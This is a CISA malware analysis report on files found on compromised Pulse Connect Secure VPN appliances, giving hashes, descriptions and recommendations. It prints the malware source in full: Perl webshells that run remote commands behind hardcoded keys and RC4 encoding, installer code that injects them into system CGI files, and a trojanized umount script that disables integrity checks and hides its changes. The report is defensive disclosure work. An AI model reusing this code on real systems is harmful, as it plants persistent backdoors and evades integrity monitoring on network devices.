Malware Analysis Report (AR21-236E)

MAR-10339606-1.v1: Pulse Secure Connect

Click to Tweet.
Click to send to Facebook.
Click to Share.

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received five files for analysis. Two files are Perl scripts that execute the attacker's commands stored in the environment variable; one file is a Perl library that provides functions to an installer; one file is a Perl script that creates a table and that table's first record; and one file is a shell script that manipulates the '/bin/umount' file and executes it. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of indicators of compromise, see: MAR-10339606-1.v1.stix

Files (5)

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928 (umount)

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767 (DSUpgrade.pm)

ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66 (licenseserverproto.cgi)

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1 (rdpreauth.cgi)

ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17 (licenseserverproto.cgi)

Findings

ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3386 bytes
Type Perl script text executable
MD5 ed914f64e3dcc179b51d9a182eefc3cd
SHA1 51c6fb115683fd29cf905a9248c7ed57c0468cec
SHA256 ade49335dd276f96fe3ba89de5eb02ea380901b5ef60ff6311235b6318c57f66
SHA512 af1e62a0bd37b639418e3f6c1d7186e3b2dfadb8e9ba8f19a6646d190757f331b43738adcd945c9d14a7c2215a6f8f68f9c6fe7ea4033c10bafc9b2d6f27c19e
ssdeep 48:Ei3LYmeAJAZo6HMeQT808inRbxUQjQk0BeWo7BuswT4o7oo7vpBBBQWBZ7zSH72d:Ei7YkJAZnqpxUxHo0v/wO27YJ
Entropy 5.336890
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This is a Perl script that executes a HTTP GET command stored in the environment variables $ENV{'QUERY_STRING'}.
If the current webpage's parameter "serverid" matches, this script fetches the attacker's command from the environment variables $ENV{'QUERY_STRING'} and executes the HTTP GET command.

This Perl script also creates a table with two columns (msg_body, msg_length) and the first record for this table. The first record's msg_body is the standard input streams and msn_length is the standard input streams' length.

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767

Tags

webshell

Details
Name DSUpgrade.pm
Size 9791 bytes
Type Perl5 module source, ASCII text
MD5 4d5b410e1756072a701dfd3722951907
SHA1 cc68a9c5ff57129e8b897d228e54807841f8ff67
SHA256 6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767
SHA512 965b13b1a11c2b2472de1f491bb3fde1d96288fa204428b135281ae7928a5bafea5c244fdd1f47a96242861c94a4fa8d5f6664f543dec33cfc519faca044766d
ssdeep 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBNaBiF3Ar8yXpayUM6:eIB1X1phiJ/irZNaBiF3CjCswmPyVoM
Entropy 5.235000
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application that has been modified to add webshell script code into the content of the Pulse Secure Perl CGI script file "/root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi."

The script contains the following patched in commented out code:

—Begin Patched In Commented CGI Code—
###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#start_total/,/\#\#end_total/w 7CxA1p' outer-do-install
#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w GqTv3w' outer-do-install
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w Vi6d8h4' outer-do-install
#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/#//' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend

###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
#    my ($var, $value) = split('=', $pair, 2);
#    
#    if($var) {
#     $value =~ s/\+/ /g ;
#     $value =~ s/%(..)/pack('c',hex($1))/eg;
#
#     $ret{$var} = $value;
#    }
# }
#
# return %ret;
#}
###cgiend1

###cgistart2
#    my $enckey='1234567';
#    my $data='1234567812345678';
#        my $cipher = RC4($enckey, $data);    
#        my $encode = MIME::Base64::encode($cipher);
#    my $psalLaunch = CGI::param("serverid");
#    if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
#    {
#    my ($cmd, %FORM);
#
#    $|=1;
#
#    print "Content-Type: text/html\r\n";
#    print "\r\n";
#    %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
#    if(defined $FORM{'cmd'}) {
#     $cmd = $FORM{'cmd'};
#    }
#
#print '<HTML>
#<body>
#<form action="" method="GET">
#<input type="text" name="cmd" size=45 value="' . $cmd . '">
#<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
#<input type="submit" value="Run">
#</form>
#<pre>';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "</pre>";
# exit(0);
#    }
###cgiend2

##end_total
--End Patched In Commented CGI Code--

The Pulse Secure Perl script also contains the following suspicious live / uncommented code. This code is designed to modify several Pulse Secure system files using the SED command as well as attempt to install code from within an archive named new-pack.tgz expected to be currently stored on the target system.

--Begin Patched In Commented Code--
sub installPackage {
my ($clean, $console, $html) = @_;

$ENV{"DSINSTALL_CLEAN"} = $clean;

##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");    
       system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/usr/bin/gzip -d /tmp/new-pack.tgz");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
       system("/bin/rm -f K872Bu");
       system("/bin/rm -f Mj1Za");
       system("/bin/rm -f 1uMfVB");    
       system("/bin/rm -fr root");
       system("rm -f /tmp/new-pack.tgz");
       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");                                        
}
else{
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}
--End Patched In Commented Code--

Analysis indicates this commented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The commented code also has the capability to modify several Pulse Secure system files utilizing the SED command.

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1

Tags

webshell

Details
Name rdpreauth.cgi
Size 1894 bytes
Type Perl script text executable
MD5 e7e2f79ade6f198c5d9707b6f94a9a41
SHA1 0a4a5be7704fa9f1a8c826888060831051767b52
SHA256 e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1
SHA512 af5ba0cd5dcc6f2761bce3950c8aa918df9611796da53657790d34d8ea014d6ece27a8fa302ebed9fd235dff2b3ce864ff0c462c3fa0997b65b666107eb3c204
ssdeep 48:E8LYaef1MCZDh7YQkg/3YElOI1P9Y611Zze4+kBkqFogb4mX/yZTOj:EaYH5Z17Yc/3Y6z/3e2CqFHbXvv
Entropy 5.032639
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure system application that has been modified to allow an operator to remotely execute commands on a compromised Pulse Secure device. Its main() function (See Figure) has been hooked with the webshell illustrated below. This webshell is similar in design and functionality to the webshell described in the file sdp_mobile_login.cgi. A primary difference in this webshell is that the static value BM6OAa1XCpH4x4ISEnJYZXmyHhJG8JxC must be passed in with the HTTP_X_KEY parameter for the webshell to process and execute a provided command.

Screenshots
Screen_Shot_2021-07-30_at_10.54.42.png -

Screen_Shot_2021-07-30_at_10.54.42.png -

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928

Details
Name umount
Size 53836 bytes
Type data
MD5 53a3bce53a360a8614337ac52672cd20
SHA1 4991f7ffbb16128fafc1c6d476a5793f4dc2554a
SHA256 4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928
SHA512 6ed95c5d452ee26bcc8b945aafb17807d1db2d6b3b46958435a02619c6cddf1b5a017a36d4e022c6e9ae57d588d29f1eac95c25496834cab86564c1f288491fe
ssdeep 768:EAkWEZfTRlHCc6DZ7z1K1q0C+i6d81CEdObeDE+sJeRbtkzuBe5Ri3XJCEJ:QWQtXkZ9K00C+iQVeQeRxOAkEJ
Entropy 6.131720
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a malicious replacement for the Unix umount binary. The modified umount application contains a bash script with an appended ELF binary. When the system attempts to perform an unmount, the "main" portion of this script will perform several system modifications to the Pulse Secure device before extracting the appended ELF binary, writing it to disk, marking it executable, and using it to actually perform the umount task. This application acts as a "hook" to the compromised device's unmount task. The system modifications performed during this "hook" are ultimately designed to provide a hacker remote command and control capabilities over a compromised Pulse Secure device.

The full malicious script contained within this application is illustrated below. After this full illustration is a summary explanation of the primary pieces of this full malicious script.

--Begin Full Malicious Script--

##sstart
#!/bin/bash
normal_um()
{
   /bin/cp /bin/umount /bin/umount_re
   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re
   /bin/sed -i '1d' /bin/umount_re
   /bin/sed -i 's/^#//' /bin/umount_re
   /bin/chmod u+x /bin/umount_re
   /bin/umount_re $*
   /bin/rm -f /bin/umount_re
   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1
}

patch_manifest()
{
   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi"
   OPENSSL="/tmp/data/root/home/bin/openssl"
   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //'`
   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"
   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest`
   if [ -n "$ori" ]; then
    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest
    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest
   fi

   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh
   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh
}


patch_cgi()
{
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount
   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/rm -f tmp1
   /bin/rm -f tmp2
}

patch_libdsp()
{
   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so
   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh
}

patch_umount()
{
   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount
   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount
   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount
   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount
   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp
   /bin/rm -f /tmp/data/root/bin/xx
}




waitweb()
{
   trap '' HUP >/dev/null 2>&1
   st=1
   while [ $st -lt 2 ] ; do
       ps -fA|grep /home/bin/web |grep -v grep > /dev/null
       if [ $? -eq 0 ]; then
           sleep 3
           /bin/mount -o remount,rw /dev/root / >/dev/null 2>&1
           st=2
           /bin/mount -o remount,ro /dev/root / > /dev/null 2>&1
       else
           sleep 2
       fi
   done
}

/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1
if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then
   patch_cgi
   patch_manifest
   patch_umount
   patch_libdsp
   normal_um $*
else
   normal_um $*
fi

###cgistart1
#use Crypt::RC4;
#use MIME::Base64 ();
###cgiend1

###cgistart2
#my $request_method=$ENV{'REQUEST_METHOD'};
#if ($request_method eq "POST") {
#    my $x_key = $ENV{'HTTP_X_KEY'};
#    if ($x_key eq "zzdibweoQxffnDEi2UKacJlEekplJ7uwrt") {
#        my $x_cmd = $ENV{'HTTP_X_CMD'};
#        my $x_cnt = $ENV{'HTTP_X_CNT'};
#        $x_cmd = MIME::Base64::decode($x_cmd);
#        $x_cmd = RC4($x_cnt, $x_cmd);
#        my $res;
#        my $re=popen(*DUMP, $x_cmd, "r");
#        while(<DUMP>){
#            $res .= $_;
#        }
#        close(*DUMP);
#        print "Content-type:text/html\n\n";
#        print MIME::Base64::encode(RC4($x_cnt, $res));
#        exit(0);
#    }
#    else {
#        exit(0);
#    }
#}
###cgiend2

##eend

--End Full Malicious Script--

The function illustrated below is designed to make a small modification to the Pulse Secure system file named libdsplibs.so. This function will change all occurrences of the string "ForceCommand" in the libdsplibs.so binary to the string "#orceCommand". The function below will also remove the string "verifyFiles" from the Pulse Secure system file named check_integrity.sh.

--Begin libdsplibs.so Modification Function--

patch_libdsp()
{
   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so
   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh
}

--End libdsplibs.so Modification Function--

The function illustrated below is designed to modify the Pulse Secure system files named manifest and check_integrity.sh. As illustrated, this function hashes the new version of the script named sdp_mobile_login.cgi, which now contains a patched in webshell. The function then counts the number of times the string "sdp_mobile_login.cgi" is found in the Pulse Secure manifest file. The malware then replaces this "sdp_mobile_login.cgi" string with the full path of the patched version, and its corresponding SHA256 value within the manifest file. The replacement string for the current "sdp_mobile_login.cgi" strings will appear similar to the following: "/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi 6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475 b".

The function then removes the strings "verify 1" and "err Signature" from the Pulse Secure system file check_integrity.sh. The purpose of these modifications are not conclusively known, however it appears the modifications may be required for the Pulse Secure system to allow the execution of the hacker modified version of sdp_mobile_login.cgi.

Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.

--Begin manifest and check_integrity.sh Modification Function--

patch_manifest()
{
   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi” //*CISA: Assign full path to variable file
   OPENSSL="/tmp/data/root/home/bin/openssl".
   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //‘` //*CISA: SHA256 hash file.
   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"         //*CISA: Build variable containing full file name and SHA256.
   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest` //*CISA: Count number of sdp_mobile_login.cgi occurrences.
   if [ -n "$ori" ]; then                
    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest //*CISA: Replace with full path of hacked sdp_mobile_login.cgi file with hash value.
    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest
   fi
   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "verify 1" string from file.
   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "err Signature" string from file.
}

--End manifest and check_integrity.sh Modification Function--

The script modifies the Pulse Secure system file named sdp_mobile_login.cgi by adding data to it from a file contained on disk named tmp2. The code utilized to modify sdb_mobile_login.cgi is illustrated below. Analysis of the modified sdb_mobile_login.cgi indicates this modification adds a webshell to the Pulse Secure applications which allows an operator to remotely issue commands to a compromised device. This patched in webshell is detailed within the description of the file sdp_mobile_login.cgi, included within this document. Notably, the function below also modifies the /bin/umount application by adding data to it contained in the files tmp1 and tmp2. After the modifications of umount and sdp_mobile_login.cgi, the function deletes the files tmp1 and tmp2. The original files tmp1 and tmp2 were not available for analysis.

--Begin sdb_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--

patch_cgi()
{
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount
   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi
   /bin/rm -f tmp1
   /bin/rm -f tmp2
}

--End sdb_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--

The malicious function illustrated below is designed to extract the ELF binary from the current (hacker modified) umount application, and run it as a standalone application to actually perform the umount function for the operating system. The function extracts the embedded ELF, writes it out to disk as /bin/umount_re, and sets it to executable via the system command /bin/chmod u+x /bin/umount_re. The function then executes the umount_re application and deletes it from disk. The final command in the function mounts /dev/root as read only. The remounting of /dev/root with read only permissions is likely a method to hide this activity from a system administrator, as it may draw the attention of system analysts that /dev/root is mounted with read and write permissions.

--Begin normal_um() Function--

normal_um()
{
   /bin/cp /bin/umount /bin/umount_re
   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re
   /bin/sed -i '1d' /bin/umount_re
   /bin/sed -i 's/^#//' /bin/umount_re
   /bin/chmod u+x /bin/umount_re
   /bin/umount_re $*
   /bin/rm -f /bin/umount_re
   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1
}

--End normal_um() Function--

The function below modifies the system application /bin/umount using the data contained in a file named /tmp/data/root/bin/xx. The function then deletes the file named /tmp/data/root/bin/xx.

--Begin patch_umount Function--

patch_umount()
{
   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount
   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount
   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount
   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount
   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp
   /bin/rm -f /tmp/data/root/bin/xx
}

--End patch_umount Function--

Illustrated below, is the "main" portion of this malicious application with comments added by our team to illustrate the purpose of this file.

Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.

--Begin Main Script--

/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1 //*CISA: Mount the /dev/root partition with read and write permissions.
if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then
   patch_cgi //*CISA: Patch the applications /bin/umount and sdp_mobile_login.cgi with malicious code (allowing remote access to device).
   patch_manifest //*CISA: Patch manifest and check_integrity.sh scripts so they will not block the now patched app sdp_mobile_login.cgi.
   patch_umount. //*CISA: Patches the /bin/umount file with data from /tmp/data/root/bin/xx.
   patch_libdsp //*CISA: Patches Pulse Secure system library /tmp/data/root/home/lib/libdsplibs.so.
   normal_um $* //*CISA: Extracts ELF from patched umount application, executes it, deletes it. Then remounts /dev/root as read only.
else
   normal_um $*
fi

--End Main Script--

ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17

Details
Name licenseserverproto.cgi
Size 1967 bytes
Type Perl script text executable
MD5 e65007255aedda92fdfc7da83463996c
SHA1 c8fd93457ab43ac6530d2a964eafe3ad918f864c
SHA256 ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17
SHA512 cb5c98ce12967f367f3fa8a820d72c85ebf183cd9aca77d8ff00d1dd847e50fdcfd1a1d819cb07ca9374f8f455838b20f0592a47789345b458270fd5ccc7358f
ssdeep 48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBM:EJYkJAZfv/wO27YJ
Entropy 5.078353
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

Upon execution, this Perl script creates a table with two columns (msg_body, msg_length) and the first record for this table. The first record's msg_body is the standard input streams and msn_length is the standard input streams' length.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

Initial Version: August 24, 2021

This product is provided subject to this Notification and this Privacy & Use policy.

Please share your thoughts.

We recently updated our anonymous product survey; we'd welcome your feedback.